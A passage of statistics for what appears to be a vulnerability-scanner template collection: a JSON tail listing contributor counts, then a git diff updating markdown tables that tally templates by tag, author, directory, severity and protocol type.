8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"meme-lord","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"lu4nx","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"thomas_from_offensity","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"vsh00t","count":3},{"name":"sushantkamble","count":3},{"name":"johnk3r","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"emenalf","count":3},{"name":"_generic_human_","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"incogbyte","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"dudez","count":3},{"name":"0w4ys","count":3},{"name":"parth","count":2},{"name":"foulenzer","count":2},{"name":"manas_harsh","count":2},{"name":"nkxxkn","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"zomsop82","count":2},{"name":"huowuzhao","count":2},{"name":"udit_thakkur","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"whoever","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"hahwul","count":2},{"name":"0xsmiley","count":2},{"name":"johnjhacking","count":2},{"name":"w4cky_","count":2},{"name":"0xcrypto","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bsysop","count":2},{"name":"koti2","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"mohammedsaneem","count":2},{"name":"fabaff","count":2},{"name":"kiblyn11","count":2},{"name":"swissky","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"pxmme1337","count":2},{"name":"afaq","count":2},{"name":"r3naissance","count":2},{"name":"socketz","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"cocxanh","count":2},{"name":"ehsahil","count":2},{"name":"convisoappsec","count":2},{"name":"g4l1t0","count":2},{"name":"gal nagli","count":2},{"name":"davidmckennirey","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"bernardofsr","count":2},{"name":"randomrobbie","count":2},{"name":"gevakun","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xsapra","count":2},{"name":"mubassirpatel","count":1},{"name":"vzamanillo","count":1},{"name":"sickwell","count":1},{"name":"bjhulst","count":1},{"name":"exploitation","count":1},{"name":"divya_mudgal","count":1},{"name":"udyz","count":1},{"name":"blckraven","count":1},{"name":"streetofhackerr007","count":1},{"name":"tirtha_mandal","count":1},{"name":"daviey","count":1},{"name":"flag007","count":1},{"name":"defr0ggy","count":1},{"name":"borna nematzadeh","count":1},{"name":"shifacyclewla","count":1},{"name":"zhenwarx","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"berkdusunur","count":1},{"name":"undefl0w","count":1},{"name":"notsoevilweasel","count":1},{"name":"manuelbua","count":1},{"name":"luci","count":1},{"name":"patralos","count":1},{"name":"omarkurt","count":1},{"name":"@dwisiswant0","count":1},{"name":"elouhi","count":1},{"name":"c3l3si4n","count":1},{"name":"andysvints","count":1},{"name":"yashgoti","count":1},{"name":"oscarintherocks","count":1},{"name":"geraldino2","count":1},{"name":"ringo","count":1},{"name":"makyotox","count":1},{"name":"alex","count":1},{"name":"thevillagehacker","count":1},{"name":"0xtavian","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"jeya seelan","count":1},{"name":"revblock","count":1},{"name":"sec_hawk","count":1},{"name":"toufik airane","count":1},{"name":"yavolo","count":1},{"name":"affix","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_harleo","count":1},{"name":"brabbit10","count":1},{"name":"jteles","count":1},{"name":"me9187","count":1},{"name":"yashanand155","count":1},{"name":"th3.d1p4k","count":1},{"name":"intx0x80","count":1},{"name":"regala_","count":1},{"name":"xstp","count":1},{"name":"apt-mirror","count":1},{"name":"b0yd","count":1},{"name":"cookiehanhoan","count":1},{"name":"deena","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"furkansenan","count":1},{"name":"tim_koopmans","count":1},{"name":"its0x08","count":1},{"name":"pratik khalane","count":1},{"name":"_darrenmartyn","count":1},{"name":"soyelmago","count":1},{"name":"adrianmf","count":1},{"name":"elder tao","count":1},{"name":"rodnt","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"sicksec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"micha3lb3n","count":1},{"name":"infosecsanyam","count":1},{"name":"kre80r","count":1},{"name":"mhdsamx","count":1},{"name":"knassar702","count":1},{"name":"0xrod","count":1},{"name":"elmahdi","count":1},{"name":"gboddin","count":1},{"name":"fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"retr0","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"evolutionsec","count":1},{"name":"mesaglio","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"sullo","count":1},{"name":"kabirsuda","count":1},{"name":"smaranchand","count":1},{"name":"luskabol","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"rojanrijal","count":1},{"name":"qlkwej","count":1},{"name":"nytr0gen","count":1},{"name":"wabafet","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"0h1in9e","count":1},{"name":"b4uh0lz","count":1},{"name":"aresx","count":1},{"name":"hanlaomo","count":1},{"name":"schniggie","count":1},{"name":"chron0x","count":1},{"name":"naglinagli","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"alph4byt3","count":1},{"name":"juicypotato1","count":1},{"name":"alperenkesk","count":1},{"name":"d0rkerdevil","count":1},{"name":"rotemreiss","count":1},{"name":"izn0u","count":1},{"name":"ahmed sherif","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"hakluke","count":1},{"name":"nerrorsec","count":1},{"name":"iampritam","count":1},{"name":"ilovebinbash","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"ahmetpergamum","count":1},{"name":"fopina","count":1},{"name":"s1r1u5_","count":1},{"name":"ajaysenr","count":1},{"name":"philippdelteil","count":1},{"name":"andirrahmani1","count":1},{"name":"0ut0fb4nd","count":1},{"name":"push4d","count":1},{"name":"pdp","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"noamrathaus","count":1},{"name":"_c0wb0y_","count":1},{"name":"bad5ect0r","count":1},{"name":"0xteles","count":1},{"name":"whynotke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"absshax","count":1},{"name":"mah3sec_","count":1},{"name":"ohlinge","count":1},{"name":"un-fmunozs","count":1},{"name":"x6263","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thezakman","count":1},{"name":"kurohost","count":1},{"name":"ldionmarcil","count":1},{"name":"bolli95","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"akash.c","count":1},{"name":"becivells","count":1},{"name":"ooooooo_q","count":1},{"name":"raesene","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"mass0ma","count":1},{"name":"akshansh","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"zandros0","count":1},{"name":"shelld3v","count":1},{"name":"taielab","count":1}],"directory":[{"name":"cves","count":803},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":250},{"name":"technologies","count":197},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":658},{"name":"high","count":620},{"name":"medium","count":463},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":2065},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 36b33f7526..909552d84f 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,823 +1,828 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | -| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | -| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | -| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | -| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | -| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | -| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 155 | princechaddha | 61 | workflows | 37 | | | | | -| cve2021 | 130 | 0x_akoko | 42 | network | 33 | | | | | -| cve2019 | 96 | gaurang | 42 | iot | 25 | | | | | -| config | 94 | philippedelteil | 27 | miscellaneous | 24 | | | | | -| cve2018 | 86 | ice3man | 26 | dns | 12 | | | | | -| joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | -| cve2010 | 69 | pr3r00t | 14 | headless | 5 | | | | | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | +| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | +| cve2021 | 139 | 0x_akoko | 43 | network | 34 | | | | | +| joomla | 128 | gaurang | 42 | iot | 25 | | | | | +| cve2010 | 108 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2019 | 96 | ice3man | 26 | dns | 12 | | | | | +| config | 94 | organiccrap | 24 | fuzzing | 10 | | | | | +| cve2018 | 86 | sheikhrishad | 15 | cnvd | 9 | | | | | +| apache | 70 | pr3r00t | 14 | headless | 5 | | | | | | takeover | 68 | milo2012 | 14 | | | | | | | | iot | 66 | techbrunchfr | 13 | | | | | | | | token | 65 | suman_kar | 12 | | | | | | | -| default-login | 63 | cyllective | 11 | | | | | | | -| oob | 55 | r3dg33k | 11 | | | | | | | -| cve2017 | 50 | wdahlenb | 10 | | | | | | | -| unauth | 47 | righettod | 10 | | | | | | | -| file | 46 | random_robbie | 10 | | | | | | | -| network | 42 | nadino | 9 | | | | | | | +| default-login | 64 | r3dg33k | 11 | | | | | | | +| oob | 57 | cyllective | 11 | | | | | | | +| cve2017 | 50 | random_robbie | 10 | | | | | | | +| unauth | 47 | wdahlenb | 10 | | | | | | | +| file | 46 | righettod | 10 | | | | | | | +| network | 43 | hackergautam | 9 | | | | | | | +| ssrf | 40 | nadino | 9 | | | | | | | | sqli | 38 | melbadry9 | 9 | | | | | | | -| ssrf | 38 | hackergautam | 9 | | | | | | | -| | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | +| | 37 | iamthefrogy | 8 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | | cve2016 | 36 | aashiq | 8 | | | | | | | -| redirect | 33 | harshbothra_ | 7 | | | | | | | -| logs | 30 | emadshanab | 7 | | | | | | | -| jira | 28 | randomstr1ng | 7 | | | | | | | -| atlassian | 27 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | oppsec | 7 | | | | | | | -| cve2015 | 24 | kophjager007 | 7 | | | | | | | -| misc | 23 | 0x240x23elu | 7 | | | | | | | -| disclosure | 22 | dogasantos | 7 | | | | | | | -| auth-bypass | 21 | dr_set | 7 | | | | | | | -| generic | 21 | meme-lord | 7 | | | | | | | -| aem | 19 | __fazal | 6 | | | | | | | -| router | 19 | puzzlepeaches | 6 | | | | | | | -| cisco | 19 | pentest_swissky | 6 | | | | | | | -| cve2014 | 19 | logicalhunter | 6 | | | | | | | -| debug | 18 | caspergn | 6 | | | | | | | -| sap | 18 | ganofins | 5 | | | | | | | -| misconfig | 18 | yanyun | 5 | | | | | | | -| springboot | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | iamnoooob | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| struts | 14 | elsfa7110 | 5 | | | | | | | -| fuzz | 14 | rootxharsh | 5 | | | | | | | -| cve2011 | 14 | lu4nx | 4 | | | | | | | -| login | 14 | nodauf | 4 | | | | | | | -| cve2012 | 14 | xelkomy | 4 | | | | | | | -| devops | 13 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | idealphase | 3 | | | | | | | +| redirect | 34 | oppsec | 7 | | | | | | | +| logs | 30 | 0x240x23elu | 7 | | | | | | | +| jira | 28 | dogasantos | 7 | | | | | | | +| atlassian | 27 | harshbothra_ | 7 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | emadshanab | 7 | | | | | | | +| cve2015 | 26 | randomstr1ng | 7 | | | | | | | +| generic | 23 | techryptic (@tech) | 7 | | | | | | | +| auth-bypass | 23 | dr_set | 7 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 22 | logicalhunter | 6 | | | | | | | +| router | 20 | __fazal | 6 | | | | | | | +| aem | 19 | pentest_swissky | 6 | | | | | | | +| cisco | 19 | puzzlepeaches | 6 | | | | | | | +| springboot | 18 | caspergn | 6 | | | | | | | +| debug | 18 | panch0r3d | 5 | | | | | | | +| misconfig | 18 | elsfa7110 | 5 | | | | | | | +| sap | 18 | yanyun | 5 | | | | | | | +| cve2012 | 17 | lu4nx | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | ganofins | 5 | | | | | | | +| login | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | iamnoooob | 5 | | | | | | | +| weblogic | 14 | e_schultze_ | 4 | | | | | | | +| fuzz | 14 | nodauf | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | xelkomy | 4 | | | | | | | +| adobe | 13 | shine | 3 | | | | | | | +| devops | 13 | unstabl3 | 3 | | | | | | | | zoho | 13 | 0w4ys | 3 | | | | | | | -| adobe | 13 | binaryfigments | 3 | | | | | | | -| aws | 12 | johnk3r | 3 | | | | | | | -| dlink | 12 | skeltavik | 3 | | | | | | | -| jenkins | 12 | impramodsargar | 3 | | | | | | | -| manageengine | 12 | emenalf | 3 | | | | | | | -| wp-theme | 11 | dudez | 3 | | | | | | | -| cve2013 | 11 | z3bd | 3 | | | | | | | -| dell | 10 | jarijaas | 3 | | | | | | | -| xxe | 10 | mavericknerd | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| ftp | 9 | unstabl3 | 3 | | | | | | | -| intrusive | 9 | shifacyclewala | 3 | | | | | | | -| ruijie | 8 | sushantkamble | 3 | | | | | | | -| airflow | 8 | fyoorer | 3 | | | | | | | -| nginx | 8 | thomas_from_offensity | 3 | | | | | | | -| scada | 8 | vsh00t | 3 | | | | | | | -| vmware | 8 | _generic_human_ | 3 | | | | | | | -| cnvd | 8 | shine | 3 | | | | | | | -| rails | 8 | incogbyte | 3 | | | | | | | -| gitlab | 8 | f1tz | 3 | | | | | | | -| confluence | 7 | yash anand @yashanand155 | 3 | | | | | | | -| coldfusion | 7 | r3naissance | 2 | | | | | | | -| netgear | 7 | moritz nentwig | 2 | | | | | | | -| backup | 7 | 0xprial | 2 | | | | | | | -| google | 7 | bp0lr | 2 | | | | | | | -| kubernetes | 7 | lotusdll | 2 | | | | | | | -| cve2009 | 7 | huowuzhao | 2 | | | | | | | -| files | 7 | swissky | 2 | | | | | | | -| ibm | 7 | 0xelkomy | 2 | | | | | | | -| microsoft | 7 | alifathi-h1 | 2 | | | | | | | -| cms | 7 | fabaff | 2 | | | | | | | -| solr | 6 | afaq | 2 | | | | | | | -| camera | 6 | foulenzer | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| docker | 6 | 0xrudra | 2 | | | | | | | -| cve2008 | 6 | cocxanh | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| jetty | 6 | x1m_martijn | 2 | | | | | | | +| dns | 13 | emenalf | 3 | | | | | | | +| dlink | 12 | sushantkamble | 3 | | | | | | | +| aws | 12 | tess | 3 | | | | | | | +| jenkins | 12 | f1tz | 3 | | | | | | | +| manageengine | 12 | johnk3r | 3 | | | | | | | +| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | +| wp-theme | 11 | z3bd | 3 | | | | | | | +| dell | 10 | incogbyte | 3 | | | | | | | +| xxe | 10 | jarijaas | 3 | | | | | | | +| intrusive | 9 | dudez | 3 | | | | | | | +| ftp | 9 | skeltavik | 3 | | | | | | | +| magento | 9 | impramodsargar | 3 | | | | | | | +| vmware | 9 | idealphase | 3 | | | | | | | +| cve2008 | 8 | shifacyclewala | 3 | | | | | | | +| scada | 8 | mavericknerd | 3 | | | | | | | +| nginx | 8 | yash anand @yashanand155 | 3 | | | | | | | +| cnvd | 8 | vsh00t | 3 | | | | | | | +| airflow | 8 | binaryfigments | 3 | | | | | | | +| rails | 8 | fyoorer | 3 | | | | | | | +| gitlab | 8 | _generic_human_ | 3 | | | | | | | +| ruijie | 8 | 0xcrypto | 2 | | | | | | | +| google | 7 | davidmckennirey | 2 | | | | | | | +| ibm | 7 | bing0o | 2 | | | | | | | +| backup | 7 | zomsop82 | 2 | | | | | | | +| kubernetes | 7 | 0xrudra | 2 | | | | | | | +| netgear | 7 | dheerajmadhukar | 2 | | | | | | | +| microsoft | 7 | hetroublemakr | 2 | | | | | | | +| coldfusion | 7 | bsysop | 2 | | | | | | | +| confluence | 7 | alifathi-h1 | 2 | | | | | | | +| files | 7 | johnjhacking | 2 | | | | | | | +| cms | 7 | randomrobbie | 2 | | | | | | | +| camera | 6 | kiblyn11 | 2 | | | | | | | +| docker | 6 | afaq | 2 | | | | | | | | citrix | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | ehsahil | 2 | | | | | | | -| api | 6 | kiblyn11 | 2 | | | | | | | -| deserialization | 5 | johnjhacking | 2 | | | | | | | -| phpmyadmin | 5 | bsysop | 2 | | | | | | | -| java | 5 | pxmme1337 | 2 | | | | | | | -| tomcat | 5 | bing0o | 2 | | | | | | | -| fileupload | 5 | koti2 | 2 | | | | | | | -| dedecms | 5 | 0xsmiley | 2 | | | | | | | -| windows | 5 | amsda | 2 | | | | | | | -| headless | 5 | arcc | 2 | | | | | | | -| hp | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | w4cky_ | 2 | | | | | | | -| iis | 5 | gal nagli | 2 | | | | | | | -| lucee | 5 | gevakun | 2 | | | | | | | -| drupal | 5 | convisoappsec | 2 | | | | | | | -| nodejs | 5 | ree4pwn | 2 | | | | | | | -| jolokia | 5 | 0xcrypto | 2 | | | | | | | -| ssti | 5 | davidmckennirey | 2 | | | | | | | -| printer | 5 | hahwul | 2 | | | | | | | -| samsung | 4 | mohammedsaneem | 2 | | | | | | | -| hongdian | 4 | random-robbie | 2 | | | | | | | -| moodle | 4 | bernardofsr | 2 | | | | | | | -| zabbix | 4 | whoever | 2 | | | | | | | -| firmware | 4 | 0xsapra | 2 | | | | | | | -| exchange | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| traversal | 4 | socketz | 2 | | | | | | | -| rfi | 4 | zomsop82 | 2 | | | | | | | -| symfony | 4 | joeldeleep | 2 | | | | | | | -| git | 4 | randomrobbie | 2 | | | | | | | -| symantec | 4 | vavkamil | 2 | | | | | | | -| thinkcmf | 4 | g4l1t0 | 2 | | | | | | | -| glpi | 4 | dheerajmadhukar | 2 | | | | | | | -| buffalo | 4 | manas_harsh | 2 | | | | | | | -| elastic | 4 | divya_mudgal | 1 | | | | | | | -| solarwinds | 4 | elmahdi | 1 | | | | | | | -| webserver | 4 | zandros0 | 1 | | | | | | | -| strapi | 4 | toufik airane | 1 | | | | | | | -| magmi | 4 | zhenwarx | 1 | | | | | | | -| artifactory | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| proxy | 4 | alex | 1 | | | | | | | -| asp | 4 | yashanand155 | 1 | | | | | | | -| zimbra | 4 | blckraven | 1 | | | | | | | -| resin | 4 | 0xtavian | 1 | | | | | | | -| vpn | 4 | _harleo | 1 | | | | | | | -| crlf | 4 | philippdelteil | 1 | | | | | | | -| thinkphp | 4 | absshax | 1 | | | | | | | -| grafana | 4 | d0rkerdevil | 1 | | | | | | | -| wso2 | 4 | apt-mirror | 1 | | | | | | | -| tikiwiki | 3 | kba@sogeti_esec | 1 | | | | | | | -| injection | 3 | yavolo | 1 | | | | | | | -| vbulletin | 3 | qlkwej | 1 | | | | | | | -| fanruan | 3 | sec_hawk | 1 | | | | | | | -| jeesns | 3 | mass0ma | 1 | | | | | | | -| log | 3 | 52971 | 1 | | | | | | | -| openssh | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| fpd | 3 | x6263 | 1 | | | | | | | -| microstrategy | 3 | intx0x80 | 1 | | | | | | | -| openam | 3 | patralos | 1 | | | | | | | -| telerik | 3 | pudsec | 1 | | | | | | | -| lfr | 3 | sickwell | 1 | | | | | | | -| bigip | 3 | defr0ggy | 1 | | | | | | | -| firebase | 3 | 0ut0fb4nd | 1 | | | | | | | -| hoteldruid | 3 | remonsec | 1 | | | | | | | -| oa | 3 | willd96 | 1 | | | | | | | -| npm | 3 | jteles | 1 | | | | | | | -| ssh | 3 | xstp | 1 | | | | | | | -| bitrix | 3 | luci | 1 | | | | | | | -| nexus | 3 | @github.com/defr0ggy | 1 | | | | | | | -| caucho | 3 | bjhulst | 1 | | | | | | | -| terramaster | 3 | shifacyclewla | 1 | | | | | | | -| slack | 3 | j33n1k4 | 1 | | | | | | | -| zhiyuan | 3 | b4uh0lz | 1 | | | | | | | -| mail | 3 | petruknisme | 1 | | | | | | | -| nosqli | 3 | shelld3v | 1 | | | | | | | -| smtp | 3 | kareemse1im | 1 | | | | | | | -| ebs | 3 | borna nematzadeh | 1 | | | | | | | -| prometheus | 3 | sshell | 1 | | | | | | | -| springcloud | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| nacos | 3 | adrianmf | 1 | | | | | | | -| kibana | 3 | raesene | 1 | | | | | | | -| kafka | 3 | elder tao | 1 | | | | | | | -| druid | 3 | udyz | 1 | | | | | | | -| amazon | 3 | me9187 | 1 | | | | | | | -| itop | 3 | 0h1in9e | 1 | | | | | | | -| linkerd | 3 | mhdsamx | 1 | | | | | | | -| httpd | 3 | deena | 1 | | | | | | | -| ofbiz | 3 | thezakman | 1 | | | | | | | -| r-seenet | 3 | wabafet | 1 | | | | | | | -| opensis | 3 | un-fmunozs | 1 | | | | | | | -| targa | 3 | schniggie | 1 | | | | | | | -| cacti | 3 | th3.d1p4k | 1 | | | | | | | -| backups | 3 | alph4byt3 | 1 | | | | | | | -| kevinlab | 3 | bolli95 | 1 | | | | | | | -| mongodb | 3 | ohlinge | 1 | | | | | | | -| jellyfin | 3 | fmunozs | 1 | | | | | | | -| liferay | 2 | ratnadip gajbhiye | 1 | | | | | | | -| ecoa | 2 | kabirsuda | 1 | | | | | | | -| sitecore | 2 | @dwisiswant0 | 1 | | | | | | | -| showdoc | 2 | smaranchand | 1 | | | | | | | -| ilo | 2 | undefl0w | 1 | | | | | | | -| sharepoint | 2 | co0nan | 1 | | | | | | | -| avantfax | 2 | retr0 | 1 | | | | | | | -| nextcloud | 2 | sicksec | 1 | | | | | | | -| icewarp | 2 | ahmetpergamum | 1 | | | | | | | -| flir | 2 | micha3lb3n | 1 | | | | | | | -| aruba | 2 | aaron_costello | 1 | | | | | | | +| api | 6 | lotusdll | 2 | | | | | | | +| laravel | 6 | vavkamil | 2 | | | | | | | +| hp | 6 | convisoappsec | 2 | | | | | | | +| solr | 6 | mohammedsaneem | 2 | | | | | | | +| jetty | 6 | 0xprial | 2 | | | | | | | +| django | 6 | gevakun | 2 | | | | | | | +| rconfig | 6 | bp0lr | 2 | | | | | | | +| java | 5 | ree4pwn | 2 | | | | | | | +| headless | 5 | cocxanh | 2 | | | | | | | +| lucee | 5 | g4l1t0 | 2 | | | | | | | +| windows | 5 | fabaff | 2 | | | | | | | +| printer | 5 | arcc | 2 | | | | | | | +| fileupload | 5 | whoever | 2 | | | | | | | +| iis | 5 | bernardofsr | 2 | | | | | | | +| ssti | 5 | nkxxkn | 2 | | | | | | | +| dedecms | 5 | parth | 2 | | | | | | | +| deserialization | 5 | random-robbie | 2 | | | | | | | +| drupal | 5 | pxmme1337 | 2 | | | | | | | +| phpmyadmin | 5 | 0xsmiley | 2 | | | | | | | +| tomcat | 5 | amsda | 2 | | | | | | | +| circarlife | 5 | 0xsapra | 2 | | | | | | | +| jolokia | 5 | ehsahil | 2 | | | | | | | +| nodejs | 5 | x1m_martijn | 2 | | | | | | | +| thinkphp | 4 | socketz | 2 | | | | | | | +| symfony | 4 | manas_harsh | 2 | | | | | | | +| zabbix | 4 | foulenzer | 2 | | | | | | | +| wso2 | 4 | swissky | 2 | | | | | | | +| resin | 4 | koti2 | 2 | | | | | | | +| solarwinds | 4 | huowuzhao | 2 | | | | | | | +| symantec | 4 | 0xelkomy | 2 | | | | | | | +| moodle | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| thinkcmf | 4 | joeldeleep | 2 | | | | | | | +| crlf | 4 | r3naissance | 2 | | | | | | | +| strapi | 4 | gal nagli | 2 | | | | | | | +| artifactory | 4 | w4cky_ | 2 | | | | | | | +| webserver | 4 | moritz nentwig | 2 | | | | | | | +| proxy | 4 | hahwul | 2 | | | | | | | +| glpi | 4 | kre80r | 1 | | | | | | | +| asp | 4 | shreyapohekar | 1 | | | | | | | +| zimbra | 4 | andysvints | 1 | | | | | | | +| elastic | 4 | retr0 | 1 | | | | | | | +| rfi | 4 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| status | 2 | c3l3si4n | 1 | | | | | | | -| cache | 2 | taielab | 1 | | | | | | | -| guacamole | 2 | hakluke | 1 | | | | | | | -| netsweeper | 2 | its0x08 | 1 | | | | | | | -| xxljob | 2 | aresx | 1 | | | | | | | -| openvpn | 2 | soyelmago | 1 | | | | | | | -| enumeration | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| traversal | 4 | pdp | 1 | | | | | | | +| grafana | 4 | hakluke | 1 | | | | | | | +| git | 4 | deena | 1 | | | | | | | +| magmi | 4 | flag007 | 1 | | | | | | | +| firmware | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| samsung | 4 | absshax | 1 | | | | | | | +| hongdian | 4 | sec_hawk | 1 | | | | | | | +| exchange | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| vpn | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| buffalo | 4 | b4uh0lz | 1 | | | | | | | +| nosqli | 3 | tim_koopmans | 1 | | | | | | | +| tikiwiki | 3 | naglinagli | 1 | | | | | | | +| lfr | 3 | becivells | 1 | | | | | | | +| itop | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| ebs | 3 | _darrenmartyn | 1 | | | | | | | +| firebase | 3 | whynotke | 1 | | | | | | | +| druid | 3 | shifacyclewla | 1 | | | | | | | +| openssh | 3 | ringo | 1 | | | | | | | +| kibana | 3 | aresx | 1 | | | | | | | +| azure | 3 | affix | 1 | | | | | | | +| microstrategy | 3 | ipanda | 1 | | | | | | | +| jeesns | 3 | @dwisiswant0 | 1 | | | | | | | +| nexus | 3 | petruknisme | 1 | | | | | | | +| zhiyuan | 3 | _harleo | 1 | | | | | | | +| mail | 3 | ratnadip gajbhiye | 1 | | | | | | | +| targa | 3 | thezakman | 1 | | | | | | | +| terramaster | 3 | notsoevilweasel | 1 | | | | | | | +| injection | 3 | alperenkesk | 1 | | | | | | | +| ssh | 3 | mesaglio | 1 | | | | | | | +| linkerd | 3 | yashgoti | 1 